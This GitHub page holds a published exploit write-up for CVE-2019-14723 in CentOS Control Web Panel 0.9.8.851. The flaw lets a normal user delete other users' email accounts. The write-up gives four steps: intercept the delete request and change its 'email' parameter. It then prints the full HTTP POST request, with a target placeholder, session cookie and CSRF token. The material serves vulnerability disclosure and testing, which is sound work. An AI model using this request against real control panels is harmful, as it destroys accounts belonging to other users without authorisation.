Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
Exploit Title       : CWP (CentOS Control Web Panel) Delete other email account
Date                : 24 Jul 2019
Exploit Author      : Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
Vendor Homepage     : https://control-webpanel.com/
Software Link       : Not available, user panel only available for lastest version
Version             : 0.9.8.851
Tested on           : CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit)
CVE-Number          : CVE-2019-14723
Reference	    : N/A
  1. Log in as a normal user.
  2. Go to "Email Accounts"
  3. Try to delete any email account
  4. Intercept the request, and modify parameter "email" to other email address
POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=emaildelete HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 21
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

email=<TARGET-EMAIL>